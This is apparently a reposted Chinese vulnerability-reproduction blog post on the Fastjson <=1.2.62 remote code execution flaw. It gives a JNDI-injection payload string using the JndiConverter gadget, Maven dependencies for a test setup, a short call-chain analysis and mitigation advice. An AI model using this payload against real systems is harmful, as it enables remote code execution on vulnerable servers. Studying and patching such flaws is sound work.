Fastjson <=1.2.62 远程代码执行-漏洞复现

栏目: IT技术 · 发布时间: 4年前

内容简介:Fastjson<=1.2.62需要开启autotypepoc:

影响范围:

Fastjson<=1.2.62

需要开启autotype

poc:

String text1 = "{\"@type\":\"org.apache.xbean.propertyeditor.JndiConverter\",\"AsText\":\"rmi://127.0.0.1:1099/exploit\"}";

pom:

    <dependency>
        <groupId>com.alibaba</groupId>
        <artifactId>fastjson</artifactId>
        <version>1.2.62</version>
    </dependency>
<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.1</version>
</dependency>



tips:这里需要另外导入jar包才能测试

Fastjson <=1.2.62 远程代码执行-漏洞复现

该黑名单主要来自于jackson- CVE-2020-8840

https://nvd.nist.gov/vuln/detail/CVE-2020-8840

漏洞复现:

Fastjson <=1.2.62 远程代码执行-漏洞复现

漏洞分析

Fastjson <=1.2.62 远程代码执行-漏洞复现

这里明显存在jndi注入,但是toObjectImpl不满足fastjson调用规则,因此查看其父类函数

Fastjson <=1.2.62 远程代码执行-漏洞复现

其父类中在toObject函数中调用了它,但是仍然不满足调用条件,因此继续溯源

Fastjson <=1.2.62 远程代码执行-漏洞复现

可以看到在setAsText函数中调用了toObject函数,并且setAstext满足调用规则,因此payload即打

Fastjson <=1.2.62 远程代码执行-漏洞复现

修复建议:

1.关了autotype,用白名单(推荐)

2.升级jdk()不太现实)


以上所述就是小编给大家介绍的《Fastjson <=1.2.62 远程代码执行-漏洞复现》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

破茧成蝶:用户体验设计师的成长之路

破茧成蝶:用户体验设计师的成长之路

刘津、李月 / 人民邮电出版社 / 2014-7 / 69.00

市面上已经有很多专业的用户体验书籍,但解决用户体验设计师在职场中遇到的众多现实问题的图书并不多见。本书从用户体验设计师的角度出发,系统地介绍了其职业生涯中的学习方法、思维方式、工作流程等,覆盖了用户体验设计基础知识、设计师的角色和职业困惑、工作流程、需求分析、设计规划和设计标准、项目跟进和成果检验、设计师职业修养以及需要具备的意识等,力图帮助设计师解决在项目中遇到的一些常见问题,找到自己的职业成长......一起来看看 《破茧成蝶:用户体验设计师的成长之路》 这本书的介绍吧!

在线进制转换器
在线进制转换器

各进制数互转换器

URL 编码/解码
URL 编码/解码

URL 编码/解码

RGB CMYK 转换工具
RGB CMYK 转换工具

RGB CMYK 互转工具